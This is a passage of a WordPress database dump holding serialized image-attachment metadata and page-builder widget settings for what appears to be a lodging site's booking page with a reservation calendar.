\"file\";s:20:\"DSC00168-330x174.jpg\";s:5:\"width\";i:330;s:6:\"height\";i:174;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:35:\"vantage-thumbnail-no-sidebar-mobile\";a:4:{s:4:\"file\";s:20:\"DSC00168-330x116.jpg\";s:5:\"width\";i:330;s:6:\"height\";i:116;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:14:\"post-thumbnail\";a:4:{s:4:\"file\";s:20:\"DSC00168-720x380.jpg\";s:5:\"width\";i:720;s:6:\"height\";i:380;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:28:\"vantage-thumbnail-no-sidebar\";a:4:{s:4:\"file\";s:21:\"DSC00168-1080x380.jpg\";s:5:\"width\";i:1080;s:6:\"height\";i:380;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:13:\"vantage-slide\";a:4:{s:4:\"file\";s:20:\"DSC00168-960x480.jpg\";s:5:\"width\";i:960;s:6:\"height\";i:480;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:16:\"vantage-carousel\";a:4:{s:4:\"file\";s:20:\"DSC00168-272x182.jpg\";s:5:\"width\";i:272;s:6:\"height\";i:182;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:17:\"vantage-grid-loop\";a:4:{s:4:\"file\";s:20:\"DSC00168-436x272.jpg\";s:5:\"width\";i:436;s:6:\"height\";i:272;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"4\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:6:\"DSC-H2\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:10:\"1157800353\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:3:\"6.9\";s:3:\"iso\";s:2:\"80\";s:13:\"shutter_speed\";s:5:\"0.001\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"1\";s:8:\"keywords\";a:0:{}}}'),(406,115,'_wp_attached_file','2016/03/DSC05132.jpg'),(407,115,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:2048;s:6:\"height\";i:1536;s:4:\"file\";s:20:\"2016/03/DSC05132.jpg\";s:5:\"sizes\";a:11:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:20:\"DSC05132-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:20:\"DSC05132-300x225.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:225;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:20:\"DSC05132-768x576.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:576;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:5:\"large\";a:4:{s:4:\"file\";s:21:\"DSC05132-1024x768.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:768;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:24:\"vantage-thumbnail-mobile\";a:4:{s:4:\"file\";s:20:\"DSC05132-330x174.jpg\";s:5:\"width\";i:330;s:6:\"height\";i:174;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:35:\"vantage-thumbnail-no-sidebar-mobile\";a:4:{s:4:\"file\";s:20:\"DSC05132-330x116.jpg\";s:5:\"width\";i:330;s:6:\"height\";i:116;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:14:\"post-thumbnail\";a:4:{s:4:\"file\";s:20:\"DSC05132-720x380.jpg\";s:5:\"width\";i:720;s:6:\"height\";i:380;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:28:\"vantage-thumbnail-no-sidebar\";a:4:{s:4:\"file\";s:21:\"DSC05132-1080x380.jpg\";s:5:\"width\";i:1080;s:6:\"height\";i:380;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:13:\"vantage-slide\";a:4:{s:4:\"file\";s:20:\"DSC05132-960x480.jpg\";s:5:\"width\";i:960;s:6:\"height\";i:480;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:16:\"vantage-carousel\";a:4:{s:4:\"file\";s:20:\"DSC05132-272x182.jpg\";s:5:\"width\";i:272;s:6:\"height\";i:182;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:17:\"vantage-grid-loop\";a:4:{s:4:\"file\";s:20:\"DSC05132-436x272.jpg\";s:5:\"width\";i:436;s:6:\"height\";i:272;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"4\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:6:\"DSC-H2\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:10:\"1333896040\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"6\";s:3:\"iso\";s:2:\"80\";s:13:\"shutter_speed\";s:9:\"0.0015625\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"1\";s:8:\"keywords\";a:0:{}}}'),(409,119,'_wp_attached_file','2016/03/Carly-008.jpg'),(410,119,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:1632;s:6:\"height\";i:1224;s:4:\"file\";s:21:\"2016/03/Carly-008.jpg\";s:5:\"sizes\";a:11:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:21:\"Carly-008-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:21:\"Carly-008-300x225.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:225;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:21:\"Carly-008-768x576.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:576;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:5:\"large\";a:4:{s:4:\"file\";s:22:\"Carly-008-1024x768.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:768;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:24:\"vantage-thumbnail-mobile\";a:4:{s:4:\"file\";s:21:\"Carly-008-330x174.jpg\";s:5:\"width\";i:330;s:6:\"height\";i:174;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:35:\"vantage-thumbnail-no-sidebar-mobile\";a:4:{s:4:\"file\";s:21:\"Carly-008-330x116.jpg\";s:5:\"width\";i:330;s:6:\"height\";i:116;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:14:\"post-thumbnail\";a:4:{s:4:\"file\";s:21:\"Carly-008-720x380.jpg\";s:5:\"width\";i:720;s:6:\"height\";i:380;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:28:\"vantage-thumbnail-no-sidebar\";a:4:{s:4:\"file\";s:22:\"Carly-008-1080x380.jpg\";s:5:\"width\";i:1080;s:6:\"height\";i:380;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:13:\"vantage-slide\";a:4:{s:4:\"file\";s:21:\"Carly-008-960x480.jpg\";s:5:\"width\";i:960;s:6:\"height\";i:480;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:16:\"vantage-carousel\";a:4:{s:4:\"file\";s:21:\"Carly-008-272x182.jpg\";s:5:\"width\";i:272;s:6:\"height\";i:182;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:17:\"vantage-grid-loop\";a:4:{s:4:\"file\";s:21:\"Carly-008-436x272.jpg\";s:5:\"width\";i:436;s:6:\"height\";i:272;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"4\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:6:\"DSC-H2\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:10:\"1178546635\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:4:\"10.6\";s:3:\"iso\";s:2:\"80\";s:13:\"shutter_speed\";s:5:\"0.004\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"1\";s:8:\"keywords\";a:0:{}}}'),(413,124,'_wp_attached_file','2016/03/map.jpg'),(414,124,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:1000;s:6:\"height\";i:773;s:4:\"file\";s:15:\"2016/03/map.jpg\";s:5:\"sizes\";a:10:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:15:\"map-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:15:\"map-300x232.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:232;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:15:\"map-768x594.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:594;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:24:\"vantage-thumbnail-mobile\";a:4:{s:4:\"file\";s:15:\"map-330x174.jpg\";s:5:\"width\";i:330;s:6:\"height\";i:174;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:35:\"vantage-thumbnail-no-sidebar-mobile\";a:4:{s:4:\"file\";s:15:\"map-330x116.jpg\";s:5:\"width\";i:330;s:6:\"height\";i:116;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:14:\"post-thumbnail\";a:4:{s:4:\"file\";s:15:\"map-720x380.jpg\";s:5:\"width\";i:720;s:6:\"height\";i:380;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:28:\"vantage-thumbnail-no-sidebar\";a:4:{s:4:\"file\";s:16:\"map-1000x380.jpg\";s:5:\"width\";i:1000;s:6:\"height\";i:380;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:13:\"vantage-slide\";a:4:{s:4:\"file\";s:15:\"map-960x480.jpg\";s:5:\"width\";i:960;s:6:\"height\";i:480;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:16:\"vantage-carousel\";a:4:{s:4:\"file\";s:15:\"map-272x182.jpg\";s:5:\"width\";i:272;s:6:\"height\";i:182;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:17:\"vantage-grid-loop\";a:4:{s:4:\"file\";s:15:\"map-436x272.jpg\";s:5:\"width\";i:436;s:6:\"height\";i:272;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(415,143,'_wp_attached_file','2016/03/cropped-logoSmall.png'),(416,143,'_wp_attachment_context','site-icon'),(417,143,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:512;s:6:\"height\";i:512;s:4:\"file\";s:29:\"2016/03/cropped-logoSmall.png\";s:5:\"sizes\";a:13:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:29:\"cropped-logoSmall-150x150.png\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";}s:6:\"medium\";a:4:{s:4:\"file\";s:29:\"cropped-logoSmall-300x300.png\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:9:\"image/png\";}s:24:\"vantage-thumbnail-mobile\";a:4:{s:4:\"file\";s:29:\"cropped-logoSmall-330x174.png\";s:5:\"width\";i:330;s:6:\"height\";i:174;s:9:\"mime-type\";s:9:\"image/png\";}s:35:\"vantage-thumbnail-no-sidebar-mobile\";a:4:{s:4:\"file\";s:29:\"cropped-logoSmall-330x116.png\";s:5:\"width\";i:330;s:6:\"height\";i:116;s:9:\"mime-type\";s:9:\"image/png\";}s:14:\"post-thumbnail\";a:4:{s:4:\"file\";s:29:\"cropped-logoSmall-512x380.png\";s:5:\"width\";i:512;s:6:\"height\";i:380;s:9:\"mime-type\";s:9:\"image/png\";}s:28:\"vantage-thumbnail-no-sidebar\";a:4:{s:4:\"file\";s:29:\"cropped-logoSmall-512x380.png\";s:5:\"width\";i:512;s:6:\"height\";i:380;s:9:\"mime-type\";s:9:\"image/png\";}s:13:\"vantage-slide\";a:4:{s:4:\"file\";s:29:\"cropped-logoSmall-512x480.png\";s:5:\"width\";i:512;s:6:\"height\";i:480;s:9:\"mime-type\";s:9:\"image/png\";}s:16:\"vantage-carousel\";a:4:{s:4:\"file\";s:29:\"cropped-logoSmall-272x182.png\";s:5:\"width\";i:272;s:6:\"height\";i:182;s:9:\"mime-type\";s:9:\"image/png\";}s:17:\"vantage-grid-loop\";a:4:{s:4:\"file\";s:29:\"cropped-logoSmall-436x272.png\";s:5:\"width\";i:436;s:6:\"height\";i:272;s:9:\"mime-type\";s:9:\"image/png\";}s:13:\"site_icon-270\";a:4:{s:4:\"file\";s:29:\"cropped-logoSmall-270x270.png\";s:5:\"width\";i:270;s:6:\"height\";i:270;s:9:\"mime-type\";s:9:\"image/png\";}s:13:\"site_icon-192\";a:4:{s:4:\"file\";s:29:\"cropped-logoSmall-192x192.png\";s:5:\"width\";i:192;s:6:\"height\";i:192;s:9:\"mime-type\";s:9:\"image/png\";}s:13:\"site_icon-180\";a:4:{s:4:\"file\";s:29:\"cropped-logoSmall-180x180.png\";s:5:\"width\";i:180;s:6:\"height\";i:180;s:9:\"mime-type\";s:9:\"image/png\";}s:12:\"site_icon-32\";a:4:{s:4:\"file\";s:27:\"cropped-logoSmall-32x32.png\";s:5:\"width\";i:32;s:6:\"height\";i:32;s:9:\"mime-type\";s:9:\"image/png\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(418,88,'panels_data','a:3:{s:7:\"widgets\";a:2:{i:0;a:7:{s:6:\"visual\";b:0;s:5:\"title\";s:35:\"CALL FOR AVAILABILITY 218-747-2959.\";s:4:\"text\";s:438:\"Book your stay by calling (218) 747-2959. The calendar is up to date showing availability. You can also send a request for booking by filling out form on right and selecting the days you wish to stay in the calendar on the right.\nWe will call you to confirm Reservation.\nRemember that a deposit is required before a booking can be confirmed. Of course if you would prefer you can just call us to set up a reservation at (218) 747- 2959.\n\n\";s:6:\"filter\";b:0;s:22:\"so_sidebar_emulator_id\";s:12:\"text-8810000\";s:11:\"option_name\";s:11:\"widget_text\";s:11:\"panels_info\";a:6:{s:5:\"class\";s:14:\"WP_Widget_Text\";s:4:\"grid\";i:0;s:4:\"cell\";i:0;s:2:\"id\";i:0;s:9:\"widget_id\";s:36:\"a3341bb8-5b40-4200-adc9-7ee4acb51ee2\";s:5:\"style\";a:2:{s:27:\"background_image_attachment\";b:0;s:18:\"background_display\";s:4:\"tile\";}}}i:1;a:8:{s:20:\"booking_widget_title\";s:0:\"\";s:19:\"booking_widget_show\";s:12:\"booking_form\";s:29:\"booking_widget_calendar_count\";s:1:\"1\";s:25:\"booking_widget_last_field\";s:0:\"\";s:19:\"booking_widget_type\";s:0:\"\";s:22:\"so_sidebar_emulator_id\";s:21:\"bookingwidget-8810001\";s:11:\"option_name\";s:20:\"widget_bookingwidget\";s:11:\"panels_info\";a:6:{s:5:\"class\";s:13:\"BookingWidget\";s:4:\"grid\";i:0;s:4:\"cell\";i:1;s:2:\"id\";i:1;s:9:\"widget_id\";s:36:\"b899f0e7-1b45-4c75-b586-28eb4cc2f24b\";s:5:\"style\";a:2:{s:27:\"background_image_attachment\";b:0;s:18:\"background_display\";s:4:\"tile\";}}}}s:5:\"grids\";a:1:{i:0;a:2:{s:5:\"cells\";i:2;s:5:\"style\";a:0:{}}}s:10:\"grid_cells\";a:2:{i:0;a:4:{s:4:\"grid\";i:0;s:5:\"index\";i:0;s:6:\"weight\";d:0.77279005524900001855570508269011043012142181396484375;s:5:\"style\";a:0:{}}i:1;a:4:{s:4:\"grid\";i:0;s:5:\"index\";i:1;s:6:\"weight\";d:0.2272099447510000091998705329388030804693698883056640625;s:5:\"style\";a:0:{}}}}'),(419,145,'panels_data','a:3:{s:7:\"widgets\";a:2:{i:0;a:5:{s:6:\"filter\";s:1:\"1\";s:4:\"text\";s:62:\"<p>Book your stay</p><p>[wpdevart_booking_calendar id=\"1\"]</p>\";s:5:\"title\";s:0:\"\";s:4:\"type\";s:6:\"visual\";s:11:\"panels_info\";a:5:{s:5:\"class\";s:31:\"SiteOrigin_Widget_Editor_Widget\";s:3:\"raw\";b:0;s:4:\"grid\";i:0;s:4:\"cell\";i:0;s:2:\"id\";i:0;}}i:1;a:6:{s:20:\"booking_widget_title\";s:0:\"\";s:19:\"booking_widget_show\";s:12:\"booking_form\";s:29:\"booking_widget_calendar_count\";s:1:\"1\";s:25:\"booking_widget_last_field\";s:0:\"\";s:11:\"panels_info\";a:4:{s:5:\"class\";s:13:\"BookingWidget\";s:4:\"grid\";i:0;s:4:\"cell\";i:0;s:2:\"id\";i:1;}s:19:\"booking_widget_type\";s:0:\"\";}}s:5:\"grids\";a:1:{i:0;a:2:{s:5:\"cells\";i:1;s:5:\"style\";a:0:{}}}s:10:\"grid_cells\";a:1:{i:0;a:2:{s:4:\"grid\";i:0;s:6:\"weight\";i:1;}}}'),(420,145,'panels_data','a:3:{s:7:\"widgets\";a:2:{i:0;a:5:{s:6:\"filter\";s:1:\"1\";s:4:\"text\";s:62:\"<p>Book your stay</p><p>[wpdevart_booking_calendar id=\"1\"]</p>\";s:5:\"title\";s:0:\"\";s:4:\"type\";s:6:\"visual\";s:11:\"panels_info\";a:5:{s:5:\"class\";s:31:\"SiteOrigin_Widget_Editor_Widget\";s:3:\"raw\";b:0;s:4:\"grid\";i:0;s:4:\"cell\";i:0;s:2:\"id\";i:0;}}i:1;a:6:{s:20:\"booking_widget_title\";s:0:\"\";s:19:\"booking_widget_show\";s:12:\"booking_form\";s:29:\"booking_widget_calendar_count\";s:1:\"1\";s:25:\"booking_widget_last_field\";s:0:\"\";s:11:\"panels_info\";a:4:{s:5:\"class\";s:13:\"BookingWidget\";s:4:\"grid\";i:0;s:4:\"cell\";i:0;s:2:\"id\";i:1;}s:19:\"booking_widget_type\";s:0:\"\";}}s:5:\"grids\";a:1:{i:0;a:2:{s:5:\"cells\";i:1;s:5:\"style\";a:0:{}}}s:10:\"grid_cells\";a:1:{i:0;a:2:{s:4:\"grid\";i:0;s:6:\"weight\";i:1;}}}'),(421,145,'panels_data','a:3:{s:7:\"widgets\";a:2:{i:0;a:5:{s:6:\"filter\";s:1:\"1\";s:4:\"text\";s:62:\"<p>Book your stay</p><p>[wpdevart_booking_calendar id=\"1\"]</p>\";s:5:\"title\";s:0:\"\";s:4:\"type\";s:6:\"visual\";s:11:\"panels_info\";a:5:{s:5:\"class\";s:31:\"SiteOrigin_Widget_Editor_Widget\";s:3:\"raw\";b:0;s:4:\"grid\";i:0;s:4:\"cell\";i:0;s:2:\"id\";i:0;}}i:1;a:6:{s:20:\"booking_widget_title\";s:0:\"\";s:19:\"booking_widget_show\";s:12:\"booking_form\";s:29:\"booking_widget_calendar_count\";s:1:\"1\";s:25:\"booking_widget_last_field\";s:0:\"\";s:11:\"panels_info\";a:4:{s:5:\"class\";s:13:\"BookingWidget\";s:4:\"grid\";i:0;s:4:\"cell\";i:0;s:2:\"id\";i:1;}s:19:\"booking_widget_type\";s:0:\"\";}}s:5:\"grids\";a:1:{i:0;a:2:{s:5:\"cells\";i:1;s:5:\"style\";a:0:{}}}s:10:\"grid_cells\";a:1:{i:0;a:2:{s:4:\"grid\";i:0;s:6:\"weight\";i:1;}}}'),(422,88,'_panels_data_preview','a:3:{s:7:\"widgets\";a:2:{i:0;a:4:{s:5:\"title\";s:33:\"See what is available this season\";s:4:\"text\";s:356:\"Book your stay by filling out form on right and selecting the days you wish to stay in the calendar on the right.\nWe will call you to confirm Reservation.\nRemember that a deposit is required before a booking can be confirmed. Of course if you would prefer you can just call us to set up a reservation at (218) 747- 2959.\n\n[wpdevart_booking_calendar id=\"1\"]\";s:11:\"panels_info\";a:5:{s:5:\"class\";s:14:\"WP_Widget_Text\";s:4:\"grid\";i:0;s:4:\"cell\";i:0;s:2:\"id\";i:0;s:5:\"style\";a:2:{s:27:\"background_image_attachment\";b:0;s:18:\"background_display\";s:4:\"tile\";}}s:6:\"filter\";b:0;}i:1;a:6:{s:20:\"booking_widget_title\";s:0:\"\";s:19:\"booking_widget_show\";s:12:\"booking_form\";s:29:\"booking_widget_calendar_count\";s:1:\"1\";s:25:\"booking_widget_last_field\";s:0:\"\";s:19:\"booking_widget_type\";s:0:\"\";s:11:\"panels_info\";a:6:{s:5:\"class\";s:13:\"BookingWidget\";s:3:\"raw\";b:0;s:4:\"grid\";i:0;s:4:\"cell\";i:1;s:2:\"id\";i:1;s:5:\"style\";a:1:{s:18:\"background_display\";s:4:\"tile\";}}}}s:5:\"grids\";a:1:{i:0;a:2:{s:5:\"cells\";i:2;s:5:\"style\";a:0:{}}}s:10:\"grid_cells\";a:2:{i:0;a:2:{s:4:\"grid\";i:0;s:6:\"weight\";d:0.77279005524900001855570508269011043012142181396484375;}i:1;a:2:{s:4:\"grid\";i:0;s:6:\"weight\";d:0.2272099447510000091998705329388030804693698883056640625;}}}'),(423,146,'panels_data','a:3:{s:7:\"widgets\";a:2:{i:0;a:5:{s:6:\"filter\";s:1:\"1\";s:4:\"text\";s:62:\"<p>Book your stay</p><p>[wpdevart_booking_calendar id=\"1\"]</p>\";s:5:\"title\";s:0:\"\";s:4:\"type\";s:6:\"visual\";s:11:\"panels_info\";a:5:{s:5:\"class\";s:31:\"SiteOrigin_Widget_Editor_Widget\";s:3:\"raw\";b:0;s:4:\"grid\";i:0;s:4:\"cell\";i:0;s:2:\"id\";i:0;}}i:1;a:6:{s:20:\"booking_widget_title\";s:0:\"\";s:19:\"booking_widget_show\";s:12:\"booking_form\";s:29:\"booking_widget_calendar_count\";s:1:\"1\";s:25:\"booking_widget_last_field\";s:0:\"\";s:11:\"panels_info\";a:4:{s:5:\"class\";s:13:\"BookingWidget\";s:4:\"grid\";i:0;s:4:\"cell\";i:0;s:2:\"id\";i:1;}s:19:\"booking_widget_type\";s:0:\"\";}}s:5:\"grids\";a:1:{i:0;a:2:{s:5:\"cells\";i:1;s:5:\"style\";a:0:{}}}s:10:\"grid_cells\";a:1:{i:0;a:2:{s:4:\"grid\";i:0;s:6:\"weight\";i:1;}}}'),(424,147,'panels_data','a:3:{s:7:\"widgets\";a:3:{i:0;a:6:{s:5:\"title\";s:0:\"\";s:4:\"text\";s:62:\"<p>Book your stay</p><p>[wpdevart_booking_calendar id=\"1\"]</p>\";s:20:\"text_selected_editor\";s:7:\"tinymce\";s:5:\"autop\";b:1;s:12:\"_sow_form_id\";s:13:\"56fc78eeada89\";s:11:\"panels_info\";a:6:{s:5:\"class\";s:31:\"SiteOrigin_Widget_Editor_Widget\";s:3:\"raw\";b:0;s:4:\"grid\";i:0;s:4:\"cell\";i:0;s:2:\"id\";i:0;s:5:\"style\";a:1:{s:18:\"background_display\";s:4:\"tile\";}}}i:1;a:4:{s:5:\"title\";s:12:\"Our Calendar\";s:4:\"text\";s:192:\"Book your stay by filling out form on right.\nWe will call you to confirm Reservation.\nRemember that a deposit is required before a booking can be confirmed.\n\n[wpdevart_booking_calendar id=\"1\"]\";s:6:\"filter\";b:0;s:11:\"panels_info\";a:6:{s:5:\"class\";s:14:\"WP_Widget_Text\";s:3:\"raw\";b:0;s:4:\"grid\";i:1;s:4:\"cell\";i:0;s:2:\"id\";i:1;s:5:\"style\";a:1:{s:18:\"background_display\";s:4:\"tile\";}}}i:2;a:6:{s:20:\"booking_widget_title\";s:0:\"\";s:19:\"booking_widget_show\";s:12:\"booking_form\";s:29:\"booking_widget_calendar_count\";s:1:\"1\";s:25:\"booking_widget_last_field\";s:0:\"\";s:19:\"booking_widget_type\";s:0:\"\";s:11:\"panels_info\";a:6:{s:5:\"class\";s:13:\"BookingWidget\";s:3:\"raw\";b:0;s:4:\"grid\";i:1;s:4:\"cell\";i:1;s:2:\"id\";i:2;s:5:\"style\";a:1:{s:18:\"background_display\";s:4:\"tile\";}}}}s:5:\"grids\";a:2:{i:0;a:2:{s:5:\"cells\";i:1;s:5:\"style\";a:0:{}}i:1;a:2:{s:5:\"cells\";i:2;s:5:\"style\";a:0:{}}}s:10:\"grid_cells\";a:3:{i:0;a:2:{s:4:\"grid\";i:0;s:6:\"weight\";i:1;}i:1;a:2:{s:4:\"grid\";i:1;s:6:\"weight\";d:0.77279005524900001855570508269011043012142181396484375;}i:2;a:2:{s:4:\"grid\";i:1;s:6:\"weight\";d:0.2272099447510000091998705329388030804693698883056640625;}}}'),(425,148,'panels_data','a:3:{s:7:\"widgets\";a:2:{i:0;a:4:{s:5:\"title\";s:12:\"Our Calendar\";s:4:\"text\";s:192:\"Book your stay by filling out form on right.\nWe will call you to confirm Reservation.\nRemember that a deposit is required before a booking can be confirmed.\n\n[wpdevart_booking_calendar id=\"1\"]\";s:6:\"filter\";b:0;s:11:\"panels_info\";a:6:{s:5:\"class\";s:14:\"WP_Widget_Text\";s:3:\"raw\";b:0;s:4:\"grid\";i:0;s:4:\"cell\";i:0;s:2:\"id\";i:0;s:5:\"style\";a:1:{s:18:\"background_display\";s:4:\"tile\";}}}i:1;a:6:{s:20:\"booking_widget_title\";s:0:\"\";s:19:\"booking_widget_show\";s:12:\"booking_form\";s:29:\"booking_widget_calendar_count\";s:1:\"1\";s:25:\"booking_widget_last_field\";s:0:\"\";s:19:\"booking_widget_type\";s:0:\"\";s:11:\"panels_info\";a:6:{s:5:\"class\";s:13:\"BookingWidget\";s:3:\"raw\";b:0;s:4:\"grid\";i:0;s:4:\"cell\";i:1;s:2:\"id\";i:1;s:5:\"style\";a:1:{s:18:\"background_display\";s:4:\"tile\";}}}}s:5:\"grids\";a:1:{i:0;a:2:{s:5:\"cells\";i:2;s:5:\"style\";a:0:{}}}s:10:\"grid_cells\";a:2:{i:0;a:2:{s:4:\"grid\";i:0;s:6:\"weight\";d:0.77279005524900001855570508269011043012142181396484375;}i:1;a:2:{s:4:\"grid\";i:0;s:6:\"weight\";d:0.2272099447510000091998705329388030804693698883056640625;}}}'),(426,153,'panels_data','a:3:{s:7:\"widgets\";a:2:{i:0;a:4:{s:5:\"title\";s:33:\"See what is available this season\";s:4:\"text\";s:261:\"Book your stay by filling out form on right and selecting the days you wish to stay in the calendar on the right.\nWe will call you to confirm Reservation.\nRemember that a deposit is required before a booking can be confirmed.\n\n[wpdevart_booking_calendar id=\"1\"]\";s:11:\"panels_info\";a:5:{s:5:\"class\";s:14:\"WP_Widget_Text\";s:4:\"grid\";i:0;s:4:\"cell\";i:0;s:2:\"id\";i:0;s:5:\"style\";a:2:{s:27:\"background_image_attachment\";b:0;s:18:\"background_display\";s:4:\"tile\";}}s:6:\"filter\";b:0;}i:1;a:6:{s:20:\"booking_widget_title\";s:0:\"\";s:19:\"booking_widget_show\";s:12:\"booking_form\";s:29:\"booking_widget_calendar_count\";s:1:\"1\";s:25:\"booking_widget_last_field\";s:0:\"\";s:19:\"booking_widget_type\";s:0:\"\";s:11:\"panels_info\";a:6:{s:5:\"class\";s:13:\"BookingWidget\";s:3:\"raw\";b:0;s:4:\"grid\";i:0;s:4:\"cell\";i:1;s:2:\"id\";i:1;s:5:\"style\";a:1:{s:18:\"background_display\";s:4:\"tile\";}}}}s:5:\"grids\";a:1:{i:0;a:2:{s:5:\"cells\";i:2;s:5:\"style\";a:0:{}}}s:10:\"grid_cells\";a:2:{i:0;a:2:{s:4:\"grid\";i:0;s:6:\"weight\";d:0.77279005524900001855570508269011043012142181396484375;}i:1;a:2:{s:4:\"grid\";i:0;s:6:\"weight\";d:0.2272099447510000091998705329388030804693698883056640625;}}}'),(427,12,'vantage_metaslider_slider',''),(428,12,'vantage_metaslider_slider_stretch','1'),(429,12,'vantage_menu_icon',''),(430,166,'_wp_attached_file','2016/03/Store2e.jpg'),(431,166,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:2560;s:6:\"height\";i:1920;s:4:\"file\";s:19:\"2016/03/Store2e.jpg\";s:5:\"sizes\";a:12:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:19:\"Store2e-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:19:\"Store2e-300x225.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:225;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:19:\"Store2e-768x576.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:576;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:5:\"large\";a:4:{s:4:\"file\";s:20:\"Store2e-1024x768.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:768;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:24:\"vantage-thumbnail-mobile\";a:4:{s:4:\"file\";s:19:\"Store2e-330x174.jpg\";s:5:\"width\";i:330;s:6:\"height\";i:174;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:35:\"vantage-thumbnail-no-sidebar-mo